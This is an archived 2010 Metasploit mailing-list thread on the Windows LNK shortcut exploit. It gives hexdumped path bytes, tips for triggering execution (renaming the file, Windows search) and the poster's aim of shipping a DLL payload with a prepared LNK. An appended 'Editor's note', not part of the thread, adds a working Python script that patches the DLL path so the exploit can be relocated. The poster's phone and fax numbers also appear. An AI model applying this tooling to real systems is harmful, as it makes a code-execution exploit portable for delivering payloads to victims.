Metasploit mailing list archives
Re: LNK Exploit Export
From: Florian Roth <Neo.X () web de>
Date: Sun, 25 Jul 2010 18:39:47 +0200
Hey, thanks, I did the following but struggled because it did not work as I expected. I changed the contents of the LNK to the name of my DLL. But that didn't do the trick. I had to use the following string with a trailing space and double point.

00000080  00 00 00 6a 00 00 00 00  00 00 20 00 3a 00 43 00  |...j...... .:.C.|
00000090  3a 00 5c 00 42 00 4e 00  57 00 45 00 6a 00 42 00  |:.\.B.N.W.E.j.B.|
000000a0  63 00 66 00 49 00 71 00  2e 00 64 00 6c 00 6c 00  |c.f.I.q...d.l.l.|
000000b0  00 00                                             |..|
000000b2

The tricky thing is that changing this does not seem to make it work. I had to rename the link file to "linkfile.lnk_" in the command line and back in EXPLORER to invoke the process defined in my DLL (calc.exe). I suppose that the renaming causes a cache to be renewed and EXPLORER to check the symbol of the link again. Without that it won't invoke the exploit coded in the DLL in my testing environment.

Additional information: A second way to invoke the exploit was to use the Windows search and search for a portion of the LNK file name. The listing of the modified LNK file in the search results led to an execution as well.

Every method worked only once per session. I had to log off and log in again to make it work another time.

Hope that helped someone. That way I am able to generate a DLL with a special payload and ship it with my prepared LNK file.

Thanks

On Sun, 2010-07-25 at 10:30 +0200, Hendrik Baecker wrote:
> On 24.07.10 21:47, Florian Roth wrote:
>> I noticed that every time I copied the generated DLL and LNK file to a different directory, the exploit does not work anymore. So I suppose that the code is bound to a fixed path where the DLL has to be located.
> Don't suppose - know!
> hexdump -C /path/to/your.lnk
> ^^
>> I'd like to send the exploit to a friend who wants to demonstrate the impact to the rest of the IT staff. Is there a possibility to export the exploit or change the absolute path to the DLL so he is able to put the LNK and DLL to i.e. "C:\" ??
> I would try to hexedit the lnk to change the voodoo you found by hexdump. Didn't try it myself yet, maybe some more knowledge about LNK file structure / the weak M$ code is needed. I wouldn't say the DLL itself might be a problem - it's just a PE DLL'd payload.
> Back to your question - I'm not aware of an export function in metasploit.
> Cheerio!
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
--
Sincerely
Saludos cordiales
Mit freundlichen Grüßen

Florian Roth
Tel: +49 06251 - 827 9402
Mobil: +49 175 - 7240 363
Fax: +49 12125 - 11699510
eMail: Florian.Roth () email de
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
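Editor's note, added example (not code from either poster or from Metasploit): the thread's recipe is "hexdump the .lnk, find the UTF-16LE path to the DLL, hex-edit it". The script below does exactly that on the 50 bytes Florian pasted (the region starting at file offset 0x80), which are embedded here as a constructed sample rather than a complete LNK. It prints a hexdump -C style listing, scans for UTF-16LE printable strings, and swaps the drive path for a new one while leaving the leading " :" that Florian found necessary untouched. Because the thread does not establish which length fields in the LNK cover that string, the patcher refuses any replacement whose encoded length differs from the original; the replacement name "evildemo01.dll" is a made-up placeholder chosen only because it has the same length as "BNWEjBcfIq.dll".

```python
"""Find and patch the UTF-16LE DLL path inside an LNK file (added example)."""
import re

# Constructed sample: the bytes from the hexdump in the thread, which begin at
# offset 0x80 of the original .lnk.  This is NOT a complete LNK file.
SAMPLE_BASE = 0x80
SAMPLE = bytes.fromhex(
    "0000006a000000000000" "20003a0043003a005c0042004e005700"   # 0x80..0x8f
    "45006a00420063006600490071002e0064006c006c00"                 # 0x90..0xaf
    "0000"                                                         # 0xb0..0xb1
)


def hexdump(data: bytes, base: int = 0) -> list[str]:
    """Render data in the same layout as `hexdump -C` (offset, hex, ASCII)."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        if len(chunk) > 8:                       # extra gap after the 8th byte
            hexpart = f"{hexpart[:23]}  {hexpart[24:]}"
        asc = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{base + off:08x}  {hexpart:<48}  |{asc}|")
    lines.append(f"{base + len(data):08x}")      # trailing end-offset line
    return lines


def find_utf16le_strings(data: bytes, min_chars: int = 4) -> list[tuple[int, str]]:
    """Return (offset, text) for runs of printable ASCII encoded as UTF-16LE.

    This is a heuristic scan, not an LNK parser: a printable byte followed by
    0x00 at an odd offset could in principle produce a false hit.
    """
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [(m.start(), m.group().decode("utf-16-le"))
            for m in re.finditer(pattern, data)]


def patch_dll_path(data: bytes, old_path: str, new_path: str) -> bytes:
    """Replace old_path with new_path (both UTF-16LE) without changing size.

    Assumption: the surrounding LNK length fields are unknown here, so the
    replacement must encode to exactly the same number of bytes; otherwise
    the structure would be silently corrupted.
    """
    old = old_path.encode("utf-16-le")
    new = new_path.encode("utf-16-le")
    if len(new) != len(old):
        raise ValueError(
            f"new path is {len(new)} bytes, old is {len(old)}; "
            "pick a DLL name of the same length")
    hits = data.count(old)
    if hits != 1:
        raise ValueError(f"expected exactly one occurrence of path, found {hits}")
    return data.replace(old, new)


if __name__ == "__main__":
    print("\n".join(hexdump(SAMPLE, SAMPLE_BASE)))
    for off, text in find_utf16le_strings(SAMPLE):
        print(f"UTF-16LE string at 0x{SAMPLE_BASE + off:x}: {text!r}")
    patched = patch_dll_path(SAMPLE, r"C:\BNWEjBcfIq.dll", r"C:\evildemo01.dll")
    print("\n".join(hexdump(patched, SAMPLE_BASE)))
```

Run it against a real file with `data = open("your.lnk", "rb").read()` and `SAMPLE_BASE = 0`; the offsets reported by find_utf16le_strings then match what hexdump -C shows. Keeping the byte length fixed is the conservative choice the thread supports; anything cleverer needs knowledge of the LNK layout that neither message provides.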
Current thread:
- LNK Exploit Export Florian Roth (Jul 24)
- Re: LNK Exploit Export Hendrik Baecker (Jul 25)
- Re: LNK Exploit Export Florian Roth (Jul 25)
- Re: LNK Exploit Export Hendrik Baecker (Jul 25)